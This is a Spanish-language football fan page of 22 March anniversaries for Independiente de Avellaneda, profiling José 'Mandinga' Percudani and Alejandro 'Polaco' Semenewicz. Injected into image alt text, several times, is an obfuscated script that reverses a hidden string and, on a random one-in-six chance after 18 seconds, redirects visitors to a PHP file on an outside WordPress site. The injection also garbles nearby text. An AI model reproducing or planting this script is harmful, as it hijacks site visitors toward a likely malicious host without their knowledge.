Conectate con nosotros

Efemérides

Efemérides del 22 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1965Nacimiento en Bragado, provincia de Buenos Aires, de José Alberto “Mandinga” Percudani, quien jugó 150 partidos entre 1982 y 1988 anotando 50 goles, y siendo campeón del Metropolitano 1983, Copa Libertadores y Copa Intercontinental 1984.

Una joyita surgida de las inferiores e hincha fanático, que promovió a la Primera División Nito Veiga con apenas 17 años, para luego darle al club uno de los goles más importantes de su historia. Fue a Liverpool en Tokio, para que lo grite todo un país y llevar al Rojo a lo más alto.

El reloj marcaba 6 minutos de juego cuando Claudio Marangoni pone la pelota para que “Mandinga”, con una corrida memorable, se meta al área y defina de zurda ante la salida del arquero, con todo el equipo inglés mirándole el 9 en su espalda, porque a sus 19 años José Percudani fue más rápido que todos y con su gol Independiente se coronó campeón del mundo. Ese gol fue su momento de gloria máxima, el que grabó su apellido para toda la eternidad.

Aun así, “Mandinga” ya venía con un alto nivel desde aquel Metropolitano1983 en el que José Pastoriza le dio la confianza, y él le pagó con 11 tantos para ser campeón, luego hizo su aporte en la Copa Libertadores y lo dicho en la Intercontinental. Percudani es poseedor de un dato interesante, de todos los equipos campeones de Independiente por torneos de AFA, fue el primer 9 surgido de inferiores que logró consagrarse siendo titular, ya que en los demás equipos campeones los delanteros de área fueron formados en otros equipos y adquiridos por el club, o bien eran suplentes.

En 1988 se va del Rojo a Austria Viena de aquel país, en 1990 pasó a Atlético Madrid donde jugó muy poco, luego tuvo pasos por Universidad de Chile, Peñarol, Estudiantes de La Plata, Almirante Brown, Talleres de Remedios de Escalada y Ferro de Pico. También fue jugador de la Selección Nacional, disputando 5 encuentros y jugando en la Copa América de 1987.

Actualmente es ayudante en el cuerpo técnico que lidera Luis Islas, estando al frente de Sol de Mayo, equipo de la provincia de Río Negro que participa del Torneo Federal A. Un genio “Mandinga”, que nunca deja de expresar su cariño por el club y jamás fui irrespetuoso a pesar de recibir muchísimas críticas en su estadía en la institución. En Bragado, fue merecidamente reconocido en vida, colocándose su nombre al estadio municipal de la ciudad.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p>Obviamente, les dejo <strong>el video de esa maravillosa corrida</strong> <strong>que llenó de gloria al club</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p><strong>1970</strong> – Independiente debuta en el Torneo Metropolitano 1970 que lo tendría como campeón, en una definición apasionante que incluyó triunfo sobre Racing para lograr la coronación, por tan sólo un gol de diferencia sobre el otro aspirante al título que fue River, pero ya habrá tiempo para explayarse sobre ello en su momen<script>$mWn=function(n){if(typeof ($mWn.list[n])==to.

Un día como hoy se da un comienzo bárbaro del equipo, porque recibió a Rosario Central en la Doble Visera y lo venció por 3 a 0, con dos goles de Aníbal “Conejo” Tarabini y un golazo de Héctor “Chirola” Yazalde, para iniciar el camino de ambos a ser los goleadores del equipo en la competencia, el primero alcanzando los 14 tantos y el segundo 12.

Pero además, hay que destacar que aquel día se vistió de Rojo por primera vez Alejandro Estanislao Semenewicz, “El Polaco”, siendo ese el primer partido de los 264 que jugaría en sus 7 años en el club. En ese lapso de tiempo, éste magnífico volante daría 10 vueltas olímpicas: Metropolitano 1970 y 1971, Copas Libertadores 1972, 1973, 1974 y 1975, Copas Interamericanas de 1973, 1974 y 1976, y la Copa Intercontinental de 1973.

Un futbolista incansable, era volante de recuperación (jugando al medio, por izquierda y por derecha), aunque también hizo las veces de marcador central y hasta de lateral. Lejos de la gambeta, lo suyo era marcar, recuperar y dar el primer pase al compañero, sumado a un despliegue realmente fuera de lo común. Si en la década del 70 hubiesen existido los contadores de kilómetros corridos muchos, creen que Alejandro tendría todos los records, ya que este hombre de mucho sacrificio parecía tener varios pulmones.

Surgió de Deportivo Morón en 1968, siendo figura desde su debut, hasta que Independiente puso los ojos en él y lo incorpora en 1970. Desde su debut un día como hoy, hasta su partida, fue titular inamovible año tras año, siendo pieza clave del equipo más ganador que haya dado la historia nacional y uno de los más ganadores a nivel mundial.

Éste jugador era de una gran versatilidad para acomodarse a las necesidades del momento, siempre en cuestiones de marca, como él mismo dijo:Pastoriza organizaba, Raimondo pensaba, y yo corría”. Pero lo cierto es que tampoco era todo correr, porque cuando “Polaco” tenía la pelota en los pies siempre sabía lo que hacía y no la rifaba, era inteligente, pensante, y con mucho temperamento. Cumplía su función de forma notable, siendo muy regular, y no se arriesgaba a hacer en el juego cosas que no eran su fuerte. Si el resto de los compañeros tenía buen nivel, en gran parte era porque “Polaco” hacía bien su trabajo.

A finales de 1976, cansado de dar vueltas olímpicas vestido de rojo, se va a Atlético Nacional de Medellín donde también fue titular, luego pasa a Cipolletti para 1980 y finalmente regresa a Deportivo Morón donde se retira en 1982. “Polaco” también vistió la camiseta de la Selección Nacional, en 9 oportunidades durante 1972. Una vez retirado supo trabajar en el cuerpo técnico del Roberto “Pipo” Ferreiro, por ejemplo al frente de Villa Dálmine, logrando ser campeón en la Temporada 1988-1989 y consiguiendo así ascender a la Primera B Nacional.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides